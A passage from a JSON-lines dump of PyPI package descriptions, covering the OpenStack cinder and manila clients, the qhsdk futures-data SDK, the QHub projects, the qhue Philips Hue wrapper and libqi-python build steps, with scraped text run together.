(Supported by API versions 3.0\n - 3.latest)\n bash-completion Prints arguments for bash_completion.\n help Shows help about this program or one of its\n subcommands.\n list-extensions\n\nOptional arguments:\n --version show program's version number and exit\n -d, --debug Shows debugging output.\n --os-auth-system \n Defaults to env[OS_AUTH_SYSTEM].\n --service-type \n Service type. For most actions, default is volume.\n --service-name \n Service name. Default=env[CINDER_SERVICE_NAME].\n --volume-service-name \n Volume service name.\n Default=env[CINDER_VOLUME_SERVICE_NAME].\n --os-endpoint-type \n Endpoint type, which is publicURL or internalURL.\n Default=env[OS_ENDPOINT_TYPE] or nova\n env[CINDER_ENDPOINT_TYPE] or publicURL.\n --endpoint-type \n DEPRECATED! Use --os-endpoint-type.\n --os-volume-api-version \n Block Storage API version. Accepts X, X.Y (where X is\n major and Y is minor\n part).Default=env[OS_VOLUME_API_VERSION].\n --bypass-url \n Use this API endpoint instead of the Service Catalog.\n Defaults to env[CINDERCLIENT_BYPASS_URL].\n --retries Number of retries.\n --profile HMAC_KEY HMAC key to use for encrypting context data for\n performance profiling of operation. This key needs to\n match the one configured on the cinder api server.\n Without key the profiling will not be triggered even\n if osprofiler is enabled on server side.\n Defaults to env[OS_PROFILE].\n --os-auth-strategy \n Authentication strategy (Env: OS_AUTH_STRATEGY,\n default keystone). For now, any other value will\n disable the authentication.\n --os-username \n OpenStack user name. Default=env[OS_USERNAME].\n --os-password \n Password for OpenStack user. Default=env[OS_PASSWORD].\n --os-tenant-name \n Tenant name. Default=env[OS_TENANT_NAME].\n --os-tenant-id \n ID for the tenant. Default=env[OS_TENANT_ID].\n --os-auth-url \n URL for the authentication service.\n Default=env[OS_AUTH_URL].\n --os-user-id \n Authentication user ID (Env: OS_USER_ID).\n --os-user-domain-id \n OpenStack user domain ID. Defaults to\n env[OS_USER_DOMAIN_ID].\n --os-user-domain-name \n OpenStack user domain name. Defaults to\n env[OS_USER_DOMAIN_NAME].\n --os-project-id \n Another way to specify tenant ID. This option is\n mutually exclusive with --os-tenant-id. Defaults to\n env[OS_PROJECT_ID].\n --os-project-name \n Another way to specify tenant name. This option is\n mutually exclusive with --os-tenant-name. Defaults to\n env[OS_PROJECT_NAME].\n --os-project-domain-id \n Defaults to env[OS_PROJECT_DOMAIN_ID].\n --os-project-domain-name \n Defaults to env[OS_PROJECT_DOMAIN_NAME].\n --os-region-name \n Region name. Default=env[OS_REGION_NAME].\n --os-token Defaults to env[OS_TOKEN].\n --os-url Defaults to env[OS_URL].\n\nAPI Connection Options:\n Options controlling the HTTP API Connections\n\n --insecure Explicitly allow client to perform \"insecure\" TLS\n (https) requests. The server's certificate will not be\n verified against any certificate authorities. This\n option should be used with caution.\n --os-cacert \n Specify a CA bundle file to use in verifying a TLS\n (https) server certificate. 
Defaults to\n env[OS_CACERT].\n --os-cert \n Defaults to env[OS_CERT].\n --os-key Defaults to env[OS_KEY].\n --timeout Set request timeout (in seconds).\n\nRun \"cinder help SUBCOMMAND\" for help on a subcommand.If you want to get a particular version API help message, you can add--os-volume-api-versionin help command, like\nthis:cinder --os-volume-api-version 3.28 helpPython APIThere\u2019s also a complete Python API, but it has not yet been documented.Quick-start using keystone:# use v3 auth with http://controller:5000/v3\n>>> from cinderclient.v3 import client\n>>> nt = client.Client(USERNAME, PASSWORD, PROJECT_ID, AUTH_URL)\n>>> nt.volumes.list()\n[...]See release notes and more athttps://docs.openstack.org/python-cinderclient/latest/."} +{"package": "qh-python-manilaclient", "pacakge-description": "Python bindings to the OpenStack Manila APIThis is a client for the OpenStack Manila API. There\u2019s a Python API (themanilaclientmodule), and a command-line script (manila). Each\nimplements 100% of the OpenStack Manila API.See theOpenStack CLI guidefor information on how to use themanilacommand-line tool. You may also want to look at theOpenStack API documentation.The project is hosted onLaunchpad, where bugs can be filed. The code is\nhosted onGithub. Patches must be submitted usingGerrit,notGithub\npull requests.This code is a fork ofCinderclientof Grizzly release and then it was\ndeveloped separately. Cinderclient code is a fork ofJacobian\u2019s python-cloudserversIf you need API support for the Rackspace\nAPI solely or the BSD license, you should use that repository.\npython-manilaclient is licensed under the Apache License like the rest of\nOpenStack.Contents:Command-line APIPython APICommand-line APIInstalling this package gets you a shell command,manila, that you\ncan use to interact with any Rackspace compatible API (including OpenStack).You\u2019ll need to provide your OpenStack username and password. You can do this\nwith the--os-username,--os-passwordand--os-tenant-nameparams, but it\u2019s easier to just set them as environment variables:export OS_USERNAME=foouser\nexport OS_PASSWORD=barpass\nexport OS_TENANT_NAME=fooprojectYou will also need to define the authentication url either with param--os-auth-urlor as an environment variable:export OS_AUTH_URL=http://example.com:5000/v2.0/Since Keystone can return multiple regions in the Service Catalog, you\ncan specify the one you want with--os-region-name(orexport OS_REGION_NAME). 
It defaults to the first in the list returned.You\u2019ll find complete documentation on the shell by runningmanila help, seemanila help COMMANDfor help on a specific command.Python APIThere\u2019s also a complete Python API, but it has not yet been documented.Quick-start using keystone:# use v2.0 auth with http://example.com:5000/v2.0/\n>>> from manilaclient.v1 import client\n>>> nt = client.Client(USER, PASS, TENANT, AUTH_URL, service_type=\"share\")\n>>> nt.shares.list()\n[...]License: Apache License, Version 2.0PyPi- package installationOnline DocumentationLaunchpad project- release managementBlueprints- feature specificationsBugs- issue trackingSourceHow to ContributeRelease Notes"} +{"package": "qhsdk", "pacakge-description": "qhsdkqhsdk\u7684\u4ecb\u7ecdqhsdk\u4e3b\u8981\u662f\u4e3ahttps://qhkch.com/\u63d0\u4f9b SDK \u7684 Python \u5e93, \u60a8\u53ef\u4ee5\u901a\u8fc7\u5947\u8d27\u53ef\u67e5\u673a\u6784VIP\u63a5\u53e3\u6587\u6863\u4e86\u89e3\u548c\u67e5\u8be2\u8be6\u7ec6\u6570\u636e\u63a5\u53e3\uff01qhsdk\u670d\u52a1\u4e8ewww.qhkch.comqhsdk\u7684\u7279\u8272qhsdk\u4e3b\u8981\u6539\u8fdb\u5982\u4e0b:qhsdk\u652f\u6301Python 3.7\u53ca\u4ee5\u4e0a\u7248\u672c;\u76ee\u524d\u63d0\u4f9b\u5df2\u63d0\u4f9b\u5947\u8d27\u53ef\u67e5\u5168\u90e8\u63a5\u53e3;\u63d0\u4f9b\u5b8c\u5584\u7684\u63a5\u53e3\u6587\u6863, \u63d0\u9ad8qhsdk\u7684\u6613\u7528\u6027;\u5b89\u88c5\u65b9\u6cd5pip install qhsdk\u5347\u7ea7\u65b9\u6cd5pip install qhsdk --upgrade\u5feb\u901f\u5165\u95e8\u76ee\u6807\u6570\u636e: \u5947\u8d27\u53ef\u67e5-\u5546\u54c1-\u6301\u4ed3\u6570\u636e\u63a5\u53e3\u793a\u4f8b\u4ee3\u7801:importqhsdkasqhpro=qh.pro_api(token=\"\u6b64\u5904\u8f93\u5165\u60a8\u7684token, \u8bf7\u8054\u7cfb\u5947\u8d27\u53ef\u67e5\u83b7\u53d6\uff01\")variety_positions_df=pro.variety_positions(fields=\"shorts\",code=\"rb1810\",date=\"2018-08-08\")print(variety_positions_df)\u793a\u4f8b\u7ed3\u679c:broker short short_chge\n0 \u94f6\u6cb3\u671f\u8d27 60987 -4228\n1 \u6c38\u5b89\u671f\u8d27 57520 -1071\n2 \u4e2d\u4fe1\u671f\u8d27 38120 -620\n3 \u56fd\u6cf0\u541b\u5b89 36498 528\n4 \u65b9\u6b63\u4e2d\u671f 32105 4444\n5 \u6d77\u901a\u671f\u8d27 29638 -2783\n6 \u4e1c\u6d77\u671f\u8d27 29250 450\n7 \u5149\u5927\u671f\u8d27 28458 -84\n8 \u5357\u534e\u671f\u8d27 27853 -144\n9 \u4e2d\u8f89\u671f\u8d27 26101 -553\n10 \u4e2d\u5927\u671f\u8d27 23761 1572\n11 \u9c81\u8bc1\u671f\u8d27 22501 -598\n12 \u5174\u8bc1\u671f\u8d27 22262 -842\n13 \u4e1c\u8bc1\u671f\u8d27 21675 -686\n14 \u5fbd\u5546\u671f\u8d27 18966 -607\n15 \u4e2d\u4fe1\u5efa\u6295 18583 -625\n16 \u534e\u6cf0\u671f\u8d27 17076 -5797\n17 \u56fd\u6295\u5b89\u4fe1 16808 349\n18 \u7533\u94f6\u4e07\u56fd 14876 376\n19 \u5e7f\u53d1\u671f\u8d27 14588 -2196\n20 \u5927\u5730\u671f\u8d27 0 -14603\u7279\u522b\u8bf4\u660e\u81f4\u8c22\u7279\u522b\u611f\u8c22AkShare\u9879\u76ee\u63d0\u4f9b\u501f\u9274\u5b66\u4e60\u7684\u673a\u4f1a;\u58f0\u660eqhsdk\u63d0\u4f9b\u7684\u6570\u636e\u4ec5\u4f9b\u53c2\u8003, 
\u4e0d\u6784\u6210\u4efb\u4f55\u6295\u8d44\u5efa\u8bae;\u4efb\u4f55\u57fa\u4e8eqhsdk\u8fdb\u884c\u7814\u7a76\u7684\u6295\u8d44\u8005\u8bf7\u6ce8\u610f\u6570\u636e\u98ce\u9669;qhsdk\u7684\u4f7f\u7528\u8bf7\u9075\u5faa\u5947\u8d27\u53ef\u67e5\u7f51\u7ad9\u7684\u7528\u6237\u534f\u8bae;qhsdk\u4f7f\u7528\u4ea7\u751f\u7684\u6240\u6709\u95ee\u9898\u7684\u6700\u7ec8\u89e3\u91ca\u6743\u5f52\u5947\u8d27\u53ef\u67e5\u7f51\u7ad9\u6240\u6709;\u7248\u672c\u66f4\u65b0\u8bf4\u660e0.0.1\n\u53d1\u5e03\u6d4b\u8bd5\u7248\u672c\n\n0.0.2\n\u8c03\u8bd5\u63a5\u53e3\n\n0.0.3\n\u589e\u52a0lxml=4.4.1\n\n0.0.4\n\u66f4\u65b0\u8bf4\u660e\u6587\u6863\n\n0.0.5\n\u65b0\u589e\u901a\u8fc7\u7528\u6237\u540d\u548c\u5bc6\u7801\u767b\u5f55\u5e76\u8bbf\u95eeVIP\u8d44\u6e90\u529f\u80fd\n\n0.0.6\n\u4fee\u6b63\u5bfc\u5165\u95ee\u9898\n\n0.0.7\n\u66f4\u65b0 README \u6587\u6863\n\n0.0.8\n\u7b2c\u4e8c\u7248\u63a5\u53e3\u6d4b\u8bd5\n\n0.0.9\n\u66f4\u65b0\u8bf4\u660e\u6587\u6863\n\n0.1.0\n\u66f4\u65b0\u6d4b\u8bd5\u6587\u4ef6\n\n0.1.1\n\u9884\u89c8\u7248\n\n0.1.2\n\u589e\u52a0 token \u4f7f\u7528\u8bf4\u660e\n\n0.1.3\n\u589e\u52a0 inventory \u53c2\u6570\u7c7b\u578b\u4e8c\n\n0.1.4\n\u65b0\u589e: \u5408\u7ea6\u6301\u4ed3\u6570\u636e\u63a5\u53e3, \u5546\u54c1\u6301\u4ed3\u6570\u636e\u63a5\u53e3, \u4fee\u590d\u90e8\u5206\u63a5\u53e3\u4e0e\u6587\u6863\u4e00\u81f4\n\n0.1.5\n\u65b0\u589e: \u589e\u52a0 broker_positions_process \u4e2d start_date \u548c end_date \u53ef\u9009\u53c2\u6570\n\n0.1.6\n\u65b0\u589e: \u589e\u52a0 variety_calc_positions \u63a5\u53e3\n\n0.1.7\n\u4fee\u6539: \u4fee\u6539 variety_all \u63a5\u53e3, \u65b0\u589e 3 \u4e2a\u5b57\u6bb5\n\n0.1.8\n\u65b0\u589e: \u65b0\u589e variety_net_position_list \u63a5\u53e3\n\n0.1.9\n\u65b0\u589e: \u540c\u6b65\u6587\u6863 2021\u5e7411\u670825\u65e5 \u7248\u672c\n\n0.1.10\n\u65b0\u589e: inventory_new \u63a5\u53e3\n\u4fee\u590d\uff1a\u8fd4\u56de\u7a7a\u503c\n\n0.1.11\n\u4fee\u590d: \u4fee\u6539 url \u5730\u5740\u6587\u6863\u6784\u5efacddocspipinstall-rrequirements.txtsphinx-build-bhtml._build"} +{"package": "qhsmodule", "pacakge-description": "No description available on PyPI."} +{"package": "qhub", "pacakge-description": "InformationLinksProjectCommunityCITable of contentsTable of contentsQHub HPCQHub:cloud: Cloud Providers:computer: InstallationPre-requisitesInstall QHub:label: Usage:question: Questions?:book: Code of Conduct:gear: Installing the Development version of QHub:raised_hands: ContributionsOngoing SupportLicenseAutomated data science platform. FromJupyterHubto Cloud environments withDask Gateway.QHub is an open source tool that enables users to build and maintain cost-effective and scalable compute/data science platforms onHPCor onKuberneteswith\nminimal DevOps experience.This repository details theQHub(Kubernetes) version.Not sure what to choose? Check out ourSetup Initializationpage.QHub HPCVersion of QHub based on OpenHPC.NOTE: The tool is currently under development. Curious? Check out theQhub HPCrepository.QHubThe Kubernetes version of QHub is built usingTerraform,Helm, andGitHub Actions. Terraform handles the build, change, and versioning of the infrastructure. Helm helps to define, install,\nand manageKubernetes. GitHub Actions is used to automatically create commits when the\nconfiguration file (qhub-config.yaml) is rendered, as well as to kick off the deployment action.QHub aims to abstract all these complexities for its users. 
Hence, it is not necessary to know any of the above mentioned technologies to have your project successfully deployed.TLDR: If you know GitHub and feel comfortable generating and using API keys, you should have all it takes to deploy and maintain your system without the need for a dedicated\nDevOps team. No need to learn Kubernetes, Terraform, or Helm.:cloud: Cloud ProvidersQHub offers out-of-the-box support forDigital Ocean, AmazonAWS,GCP, and MicrosoftAzure.For more details, check out the releaseblog post.:computer: InstallationPre-requisitesQHub is supported by macOS and Linux operating systems (Windows isNOTcurrently supported).Compatible with Python 3.7+. New to Python? We recommend usingAnaconda.Adoption of virtual environments (conda,pipenvorvenv) is also encouraged.Install QHubTo install QHub type the following commands in your command line:Install usingconda:condainstall-cconda-forgeqhubInstall usingpip:pipinstallqhubOnce finished, you can check QHub's version (and additional CLI args) by typing:qhub--helpIf successful, the CLI output will be similar to the following:usage:qhub[-h][-v]{deploy,destroy,render,init,validate}...\n\nQHubcommandline\n\npositionalarguments:{deploy,destroy,render,init,validate}QHub\n\noptionalarguments:-h,--helpshowthishelpmessageandexit-v,--versionQHubversion:label: UsageQHub requires the setting of environment variables to automate the deployments fully. For details on how to obtain those variables, check theinstallation guidein the docs.Once all the necessary credentials are gathered and set asUNIX environment variables, QHub can be\ndeployed in under 20 minutes using:qhubinit...# generates initial config file and optionally automates deployment stepsqhubdeploy...# creates and configures the cloud infrastructure:question: Questions?Have a look at ourFAQto see if your query has been answered.We separate the queries for QHub into:GitHub Discussionsused to raise discussions about a subject, such as: \"What is the recommended way to do X with QHub?\"Issuesfor queries, bug reporting, feature requests,documentation, etc.We work around the clock to make QHub better, but sometimes your query might take a while to get a reply. We apologise in advance and ask you to please, be patient :pray:.:book: Code of ConductTo guarantee a welcoming and friendly community, we require contributors to follow ourCode of Conduct.:gear: Installing the Development version of QHubTo install the latest developer version (unstable) use:pipinstallgit+https://github.com/Quansight/qhub.git@dev:raised_hands: ContributionsThinking about contributing? Check out ourContribution Guidelines.Ongoing SupportThev0.4.0release introduced many changes that will irrevocably break your deployment if you attempt an inplace upgrade; for details see ourRELEASEnotes. In order to focus on the future direction of the project, we have decided as a team that we will providelimitedsupport for older versions. Any new user is encouraged to usev0.4.0or greater.If you're using an older version of QHub and would like professional support, please reach out to Quansight.LicenseQHub is BSD3 licensed."} +{"package": "qhub-jupyterhub-theme", "pacakge-description": "Please submit issues tohttps://github.com/quansight/qhub/issuesCustom JupyterHub Template for QHubThis repo contains html jinja2 templates for customising the\nappearance of JupyterHub. 
Each HTML file here will override the files\ninhttps://github.com/jupyterhub/jupyterhub/tree/master/share/jupyter/hub/templates.UsageInstallqhub_jupyterhub_themein your environmentpipinstallqhub_jupyterhub_themeAdd the following to the jupyterhub configuration to pickup the new\njinja2 templates directory and static files.fromqhub_jupyterhub_themeimporttheme_extra_handlers,theme_template_pathsc.JupyterHub.extra_handlers=theme_extra_handlersc.JupyterHub.template_paths=theme_template_pathsFinally customize the templates via thetemplate_vars. Current\noptions are:hub_titlehub_subtitlewelcomelogoprimary_colorsecondary_color`accent_color'text_colorh1_colorh2_colornavbar_text_colornavbar_hover_colorInternal options:cdsdashboards_enabledcdsdashboards_restrictedqhub_theme_extra_js_urlsInspiration is in the test jupyterhub configurationtest_jupyterhub_config.py.c.JupyterHub.template_vars={'hub_title':'This is QHub','hub_subtitle':'your scalable open source data science laboratory.','welcome':'have fun.',}TestingInstall the development environmentcondaenvinstall-fenvironment.yamlYou do not need to restart jupyterhub to see changes incustomandtemplates. Run jupyterhub via the test scriptjupyterhub--configtest_jupyterhub_config.pyTo run in VSCode, here is a launch.json config:{\n \"name\": \"JupyterHub test\",\n \"type\": \"python\",\n \"request\": \"launch\",\n \"module\": \"jupyterhub\",\n \"args\": [\"-f\", \"./test_jupyterhub_config.py\"],\n \"cwd\": \"${workspaceFolder}\"\n}You would need to make sure the Python virtualenv you've set up for this is active in the project.ChangelogVersion 0.3.6Extend navbar links #16Version 0.3.5Updates to the version display style #15Version 0.3.4Updades to ReadmeExpose navbar color options #12Add option to display Qhub version #13Version 0.3.3Simplify the JupyterHub config (backwards-compatible)Added testing docs for VScodeVersion 0.3.2Added Dashboards menu page and headerAdded custom js tag functionality #11Version 0.3.1Add text color and defaults to template options #9Version 0.3.0Adds colors! :tada:"} +{"package": "qhub-ops", "pacakge-description": "QHub-OpsIs a tool for initializing and maintaining the state of QHub\ndeployments on Digital Ocean, Amazon Web Services, and Google Cloud\nPlatform.Installation:pipinstallqhub-opsConfigurationQHub is entirely controlled from a configuration file. Example\nconfiguration files can be found intests/assets. Documentation\non creating a configuration file is detailedhere.Templates for each file are at the following paths:AWS :: tests/assets/config_aws.yamlDO :: tests/assets/config_do.yamlGCP :: tests/assets/config_gcp.yamlInitializing the Provider TemplateThe exact naming of the configuration file is needed to trigger the CI\nactions when the configuration is changed.mkdir# mv /qhub-ops-config.yamlqhub-opsrender-c/qhub-ops-config.yaml-o/--forceAfter initialising the provider templates, follow the instructions in\ndocs on deploying the infrastructure at/docs/installation.md. At this current moment some\nbootstrapping is required before github-actions can manage the\ninfrastructure as code. All of these instructions are automated inscripts/00-guided-install.sh. Note that you will need to set the\nenvironment variables inintallation.mdfor this script to\nsucceed. 
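Pulling the template_vars options listed above for qhub-jupyterhub-theme into one place, a jupyterhub_config.py could look like the sketch below; the colour values are placeholders chosen for illustration, not defaults shipped by the package.

```python
# jupyterhub_config.py -- combines the documented theme options; colours are placeholders.
from qhub_jupyterhub_theme import theme_extra_handlers, theme_template_paths

c.JupyterHub.extra_handlers = theme_extra_handlers
c.JupyterHub.template_paths = theme_template_paths
c.JupyterHub.template_vars = {
    "hub_title": "This is QHub",
    "hub_subtitle": "your scalable open source data science laboratory.",
    "welcome": "have fun.",
    "primary_color": "#4f4173",    # placeholder colour
    "secondary_color": "#957da6",  # placeholder colour
    "accent_color": "#32c574",     # placeholder colour
    "text_color": "#111111",       # placeholder colour
}
```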
You will be prompted several times for use actions such as\nsetting oauth provider and dns.scripts/00-guided-install.shTerraform Module DependenciesThis project depends on the terraform modules repository:https://github.com/Quansight/qhub-terraform-modulesArchitectureThe architecture diagrams for each cloud provider is inarchitecturefolder.\nTo generate them, just run the following command:python.pyLicenseqhub-ops is BSD3 licensed"} +{"package": "qhue", "pacakge-description": "QhueQhue (pronounced 'Q') is an exceedingly thin Python wrapper for the Philips Hue API.I wrote it because some of the other (excellent) frameworks out there weren't quite keeping up with developments in the API. Because Qhue encodes almost none of the underlying models - it's really just a way of constructing URLs and HTTP calls - it should inherit any new API features automatically. The aim of Qhue is not to create another Python API for the Hue system, so much as to turn the existing APIintoPython, with minimal interference.Understanding QhuePhilips, to their credit, created a beautiful RESTful API for the Hue system, documented it and made it available from very early on. If only more manufacturers follwed their example!You can (and should) readthe full documentation here, but a quick summary is that resources like lights, scenes and so forth each have a URL, that might look like this:http://[myhub]/api//lights/1You can read information about light 1 by doing an HTTP GET of this URL, and modify it by doing an HTTP PUT.In theqhuemodule we have a Resource class, which representssomething that has a URL. By calling an instance of this class, you'll make an HTTP request to the hub on that URL.It also has a Bridge class, which is a handy starting point for building Resources (and is itself a Resource). If that seems a bit abstract, don't worry - all will be made clear below.Installing QhueThat's easy.pip install qhueor, more correctly these days:python3 -m pip install qhueYou may want to checkGitHubfor the latest version of the module, and of this documentation. The very latest code is likely to be onthe 'develop' branch.Please note that Qhue, from version 2.0 onwards, expects Python 3 or later. If you still need to support Python 2, you should use an earlier version of Qhue.ExamplesNote: These examples assume you know the IP address of your bridge. Seethe 'Getting Started' section of the API docsif you need help in finding it. I've assigned mine a static address of 192.168.0.45, so that's what you'll see below.They also assume you have experimented with the API before, and so have a user account set up on the bridge, and the username stored somewhere. This is easy to do, but you will need to read the section below entitled 'Creating a user' before actually trying any of the following.OK. 
Now those preliminaries are out of the way...First, let's create a Bridge, which will be your top-level Resource.# Connect to the bridge with a particular usernamefromqhueimportBridgeb=Bridge(\"192.168.0.45\",username)You can see the URL of any Resource:# This should give you something familiar from the API docs:# the base URL for API calls to your Bridge.print(b.url)By requesting mostotherattributes of a Resource object, you will construct a new Resource with the attribute name added to the URL of the original one:lights=b.lights# Creates a new Resource with its own URLprint(lights.url)# Should have '/lights' on the endOr,toshowitanotherway,here's what these look like on my system:>>>b.url'http://192.168.0.45/api/sQCpOqFjZT2uYlFa2TNKXFbX0RZ6OhBjlYeUo-8F'>>>b.lights.url'http://192.168.0.45/api/sQCpOqFjZT2uYlFa2TNKXFbX0RZ6OhBjlYeUo-8F/lights'Now,theseResourcesare,atthisstage,simply*references*toentitiesonthebridge:theyhaven't communicated with it yet. So far, it'sjustawayofconstructingURLs,andyoucanconstructoneswhichwouldn't actually do anything for you if you tried to use them!# Not actually included with my bridge, but I can still get a URL for it:>>>b.phaser_bank.url'http://192.168.0.45/api/sQCpOqFjZT1uYlFa2TNKXFbX0RZ6OhDjlYeUo-8F/phaser_bank'TomakeanactualAPIcalltothebridge,wesimply*call*theResourceasifitwereafunction:```python# Let's actually call the API and print the resultsprint(b.lights())Qhue takes the JSON that is returned by the API and turns it back into Python objects, typically a dictionary, so you can access its parts easily, for example:# Get the bridge's configuration info as a dict,# and print the ethernet MAC addressprint(b.config()['mac'])So we've seen that you can callb.lights()andb.config(). What other calls can you make to the bridge?Well, you can actually call the bridge itself, and you get back a great big dictionary with everything in it. It's a bit slow, so if you know what you want, it's better to focus on that specific call. But by looking at the keys of that dictionary, you can see what the top-level groups are:>>>forkinb():print(k)lightsgroupsconfigschedulesscenesrulessensorsresourcelinksand you can explore within these lower levels too:>>>forkinb.sensors():print(k)12458...OK, let's think about URLs again.Ideally, we'd like to be able to construct all of our URLs the same way we did above, so we would refer to light 1 asb.lights.1, for example. But this bumps up against a limitation of Python: you can't use numbers as attribute names. Nor can you use variables. So we couldn't get lightnby requestingb.lights.neither.As an alternative, therefore, Qhue will also let you use dictionary key syntax - for example,b.lights[1]orb.lights[n].# Get information about light 1print(b.lights[1]())# or, to do the same thing another way:print(b['lights'][1]())Alternatively, when youcalla resource, you can give it arguments, which will be added to its URL when making the call:# This is the same as the last examples:print(b('lights',1))So there are several ways to express the same thing, and you can choose the one which fits most elegantly into your code.Here's another example, and instead of lights, we'll use sensors (switches, motion sensors etc). 
This one-liner will tell you where people are moving about:>>> [s['name'] for s in b.sensors().values() if s['state'].get('presence')]\n[\"Quentin's study\", \"Hall\", \"Kitchen\"]Let's explain that one-liner, by way of revision:b.sensorsis a Resource representing your sensors, sob.sensors()will make an API call and get back a dict of information about all your sensors, indexed by their ID. We don't care about the ID keys here, so we useb.sensors().values()to get a list containing just the data about each sensor.Each item in this list is a dict which will include a 'name' and a 'state', and if the state includes a 'presence' with a true value, then it is a motion sensor which is detecting movement.Making changesNow, to make a change to a value, such as the brightness of a bulb, you also call the resource, but you add keyword arguments to specify the properties you want to change. You can change the brightness and hue of a light by setting properties on itsstate, for example:b.lights[1].state(bri=128,hue=9000)and you can mix URL-constructing positional arguments with value-setting keyword arguments, if you like:# Positional arguments are added to the URL.# Keyword arguments change values.# So these are equivalent to the previous example:b.lights(1,'state',bri=128,hue=9000)b('lights',1,'state',bri=128,hue=9000)When you need to specify boolean true/false values, you should use the native Python True and False.As a more complex example, if you want to set the brightness and colour temperature of a light in a given scene, you might use a call like this:bridge.scenes[scene].lightstates[light](on=True,bri=bri,ct=ct)The above examples cover most simple cases.If you don't have any keyword arguments, the HTTP request will be a GET, and will tell you about the current status. If you do have keyword arguments, it will become a PUT, and it will change the current status.Sometimes, though, you need to specify a POST or a DELETE, and you can do so with the specialhttp_methodargument, which will override the above rule:# Delete rule 1b('rules',1,http_method='delete')If you need to specify a keyword argument that would conflict with a Python keyword, such asclass, simply append an underscore to it, like this:# Set property \"class\" to \"Hallway\".# The trailing underscore will automatically be removed# in the property name sent to the bridge.b.groups[19](class_='Hallway')Finally, for certain operations, like schedules and rules, you'll want to know the 'address' of a resource, which is the absolute URL path - the bit after the IP address, or, more recently, the bit after the username. You can get these with theaddressandshort_addressattributes:>>>b.groups[1].url'http://192.168.0.45/api/ac594202624a7211ac44615430a461/groups/1'>>>b.groups[1].address'/api/ac594202624a7211ac44615430a461/groups/1'>>>b.groups[1].short_address'/groups/1'See the API docs for more information about when you need this.And, at present, that's about it.A couple of hintsSome of the requests can return large amounts of information. A handy way to make it more readable is to format it as YAML. You may need topip install PyYAML, then try the following:importyamlprint(yaml.safe_dump(bridge.groups(),indent=4))The Bridge generally returns items in a reasonably logical order. The order is not actually important, but if you wish to preserve it, then you probablydon'twant the JSON structures turned into Python dicts, since these do not generally preserve ordering. 
When you construct the Bridge object, you can tell it to use another function to turn JSON dictionaries into Python structures, for example by specifyingobject_pairs_hook=collections.OrderedDict. This will give you OrderedDicts instead of dicts, which is a benefit in almost every way, except that any YAML output you create from it won't look so nice.If you're familiar with the Jupyter (iPython) Notebook system, it can be a fun way to explore the API. See theQhue Playground example notebook.If there is an error, aQhueExceptionwill be raised. If the error was returned from the API call, as described inthe documentation, it will have a type and address field as well as the human-readable message, making it easier, for example, to ignore certain types of error.Creating a userIf you haven't used the API before, you'll need to create a user account on the bridge.fromqhueimportcreate_new_usernameusername=create_new_username(\"192.168.0.45\")You'll get a prompt saying that the link button on the bridge needs to be pressed. Go and press it, and you should get a generated username. You can now get a new Bridge object as shown in the examples above, passing this username as the second argument.Please have a look at the examples directory for a method to store the username for future sessions.Usage notesPlease note that qhue won't do any local checking of any method calls or arguments - it just packages up what you give it and sends it to the bridge.An important example of this is that the bridge is expecting integer values for things like colour temperature and brightness. If, say, you do a calculation for your colour which returns a float, you need to convert that to an int before sending or it will be ignored. (Sending a string returns an error, but sending a float does not.)PrerequisitesThis requires Python 3. It uses Kenneth Reitz's excellentrequestsmodule, so you'll need to do:pip install requestsor something similar before using Qhue. If you installed Qhue itself using pip, this shouldn't be necessary.Remote accessStarting with version 2, Qhue has a wrapper to support remote access: interacting with your Hue hub via the Philips servers when you are at a remote location, in the same way that a phone app might do when you are away from home.For more information see [[README-remote.md]].LicenceThis little snippet is distributed under the GPL v2. See the LICENSE file. (They spell it that way on the other side of the pond.) It comes with no warranties, express or implied, but just with the hope that it may be useful to someone.ContributingSuggestions, patches, pull requests welcome. There are many ways this could be improved.If you can do so in a general way, without adding too many lines, that would be even better! 
Brevity, as Polonius said, is the soul of wit.Many thanks to John Bond, Sander Johansson, Travis Evans, David Coles, Chris Macklin, Andrea Jemmett, Martin Paulus, Ryan Turner, Matthew Clapp, Marcus Klaas de Vries and Richard Morrison, amongst others, for their contributions!Quentin Stafford-Fraser"} +{"package": "qhwjbfuhbqfiuhbqe", "pacakge-description": "No description available on PyPI."} +{"package": "qhxc-api", "pacakge-description": "No description available on PyPI."} +{"package": "qhyper", "pacakge-description": "A package that allows to build and solve quantum and classical problems using predefined solvers and problems."} +{"package": "qi", "pacakge-description": "This repository contains the official Python bindings of theLibQi, theqiPython module.BuildingTo build the project, you need:a compiler that supports C++17.on Ubuntu:apt-get install build-essential.CMake with at least version 3.23.on PyPI (recommended):pip install \u201ccmake>=3.23\u201d.on Ubuntu:apt-get install cmake.Python with at least version 3.7 and its development libraries.On Ubuntu:apt-get install libpython3-dev.a Pythonvirtualenv.On Ubuntu:apt-get install python3-venv\npython3 -m venv ~/my-venv # Use the path of your convenience.\nsource ~/my-venv/bin/activateNoteThe CMake project offers several configuration options and exports a set\nof targets when installed. You may refer to theCMakeLists.txtfile\nfor more details about available parameters and exported targets.NoteThe procedures described below assume that you have downloaded the project\nsources, that your current working directory is the project sources root\ndirectory and that you are working inside your virtualenv.ConanAdditionally,libqi-pythonis available as a Conan 2 project, which means you\ncan use Conan to fetch dependencies.You can install and/or upgrade Conan 2 and create a default profile in the\nfollowing way:#install/upgradeConan2pip install --upgrade conan~=2#createadefaultprofileconan profile detectInstall dependencies from Conan and build with CMakeThe procedure to build the project using Conan to fetch dependencies is the\nfollowing.Most dependencies are available on Conan Center repository and should not\nrequire any additional steps to make them available. However, you might need to\nfirst get and export thelibqirecipe into your local Conan cache.#GitHubisavailable,butyoucanalsouseinternalGitLab.QI_REPOSITORY=\"https://github.com/aldebaran/libqi.git\"\nQI_VERSION=\"4.0.1\" # Checkout the version your project need.\nQI_PATH=\"$HOME/libqi\" # Or whatever path you want.\ngit clone \\\n --depth=1 `# Only fetch one commit.` \\\n --branch \"qi-framework-v${QI_VERSION}\" \\\n \"${QI_REPOSITORY}\" \\\n \"${QI_PATH}\"\nconan export \"${QI_PATH}\" \\\n --version \"${QI_VERSION}\" # Technically not required but some#versionsoflibqirequireit#becauseofabug.You can then install thelibqi-pythondependencies in Conan.conan install . \\\n --build=missing `# Build dependencies binaries that are missing in Conan.` \\\n -s build_type=Debug `# Build in debug mode.` \\\n -c tools.build:skip_test=true `# Skip tests building for dependencies.` \\\n -c '&:tools.build:skip_test=false' # Do not skip tests for the project.This will generate a build directory containing a configuration with a\ntoolchain file that allows CMake to find dependencies inside the Conan cache.You can then invoke CMake directly inside the build configuration directory to\nconfigure and build the project. Fortunately, Conan also generates a CMake\npreset that simplifies the process. 
